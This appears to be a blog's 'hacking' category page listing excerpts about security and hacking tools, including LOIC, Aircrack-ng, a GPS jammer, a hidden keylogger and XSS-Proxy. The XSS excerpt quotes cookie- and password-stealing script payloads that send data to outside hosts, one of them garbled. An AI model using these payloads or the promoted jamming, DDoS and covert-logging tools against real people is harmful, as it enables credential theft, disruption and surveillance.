RSS Feed for hackingCategory: hacking

Recover Windows Password and Repair Your Windows Machine »

Trinity Rescue Kit or TRK is a free live Linux distribution that aims specifically at recovery and repair operations on Windows machines, but is equally usable for Linux recovery issues. Since version 3.4 it has an easy to use scrollable text menu that allows anyone who masters a keyboard and some English to perform maintenance [...]

Hack Codegen »

Hack Codegen is a library for easily generating Hack code and writing it into signed files that prevent undesired modifications. The idea behind writing code that writes code is to raise the level of abstraction and reduce coupling. You can use your own way of describing a problem and generate the corresponding code. E.g. see [...]

Wave Bubble–Open Source GPS Jammer »

Wave Bubble: a self-tuning, wide-bandwidth portable RF jammer. The device is lightweight and small for easy camouflaging: it is the size of a pack of cigarettes. An internal lithium-ion battery provides up to 2 hours of jamming (two bands, such as cell) or 4 hours (single band, such as cordless phone, GPS, WiFi, bluetooth, etc). [...]

Android Network Spoofer »

Network Spoofer lets you change websites on other people’s computers – from your phone. Network Spoofer runs on Android devices with the following requirements: Which are rooted (‘su’). Have an SD card (or internal storage) with >450MB spare space. Which has Wifi The first can be obtained by using a custom firmware such as CyanogenMod. [...]

OS for Your Raspberry Pi »

Raspbian is a free operating system based on Debian optimized for the Raspberry Pi hardware. An operating system is the set of basic programs and utilities that make your Raspberry Pi run. However, Raspbian provides more than a pure OS: it comes with over 35,000 packages, pre-compiled software bundled in a nice format for easy [...]

Android Meets Arduino »

Amarino is a toolkit, basically consisting of an Android application and an Arduino library which will help you to interface with your phone in a new dimension. You can build your own interfaces almost without any programming experience. Cell phones are great for communication in a virtual manner, but lack expressiveness in personal surroundings. Many [...]

SamyGO:Samsung TV Firmware Hacking »

SamyGO is created for research on Samsung TV Firmware Hacking Telnet and SSH Access to your TV Video Aspect Resolution Fix for playing movies a dts codec support on B series (at last) Playing USB2.0 Videos on B55x and later series Support playing videos via mounting NFS,SAMBA and UPNP shares Support non-Samsung branded WiFi dongles [...]

Open Source DDOS Tool »

Low Orbit Ion Cannon is a DDOS tool LOIC (Low Orbit Ion Cannon) is an app, written in C# that was exploited during Project Chanology to attack many web sites. It attempts to DoS the target site by bandwidth reaping, sending TCP, UDP, or HTTP requests to the site. It is also in the Dangerous [...]

Open Source Wireless Hacking »

AirFart is a wireless tool created to detect wireless devices, calculate their signal strengths, and present them to the user in an easy-to-understand fashion. It is written in C/C++ with a GTK front end. Airfart supports all wireless network cards supported by the linux-wlan-ng Prism2 driver that provide hardware signal strength information in the "raw [...]

Finding Website Vulnerabilities »

SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites. The tool requires Google web services API license key. Browse to http://www.google.com/apis/ and follow the instructions to get the license key. Provide the license key at the bottom-right box on the tool. Enter the domain [...]

Assembler Debugger for Windows »

OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg is a shareware, but you can download and use it for free. Special highlights are: Intuitive user interface, no cryptical commands Code analysis – traces registers, recognizes procedures, [...]

Open Source Penetration Testing Tool »

Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. [...]

Open Source TCP Session Hijacking Tool »

Hunt is a tool for exploiting well known weaknesses in TCP/IP protocol. Use primarily to hijack connections, but has many other features. Hunt is a program for intruding into a connection, watching it and resetting it. Hunt operates on Ethernet and is best used for connections which can be watched through it. However, it is [...]

Cross Site Scripting Attack Tool »

XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool. Types of information leakage due to XSS attack 1. Client can reveal cookies to 3rd party (session state, order info, etc) http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi">http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script> 2. Client can reveal posted form items to 3rd party (userID/passwd, etc) <form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src=’http://www.malicioussite.com/’+document.forms(1).login.value’+’:’+ document.forms(1).password.value;" </form> 3. Client can be [...]

Hacking: Information Digging Application »

SEAT (Search Engine Assessment Tool) is the next generation information digging application geared toward the needs of security professionals. SEAT uses information stored in search engine databases, cache repositories, and other public resources to scan a site for potential vulnerabilities. It’s multi-threaded, multi-database, and multi-search-engine capabilities permit easy navigation through vast amounts of information with [...]

A Powerful Windows KeyLogger »

Light Logger is a monitoring software that allows you to keep track of what is happening on your computer. This spy software runs hidden in the background, and automatically logs all keystrokes. Light Logger monitoring software starts at a low level that allow you to make logging even when an anti-keylogger is installed. It features: [...]

Open Source RootKit Tool »

There is some security tools available at http://www.immunityinc.com/resources-freesoftware.shtml including a rootkit tool called DR RootKit.

Wireless Network Cracking »

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, [...]

Detect Wireless Network using NetStumbler »

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses: Verify that your network is set up the way you intended. Find locations with poor coverage in your WLAN. Detect other networks that might be causing interference with your network. [...]

Reset Your Password on Windows Vista, Windows XP, Windows 2000, Windows 2003 Server, Windows NT using USB Drive »

In my earlier article, I described various tools that can be used to reset Windows password. To use these tools, I have to create a bootable CD from the ISO image given. I have encountered one problem recently whereby one of the laptop passed to me has no floppy and the external CD-ROM is missing. [...]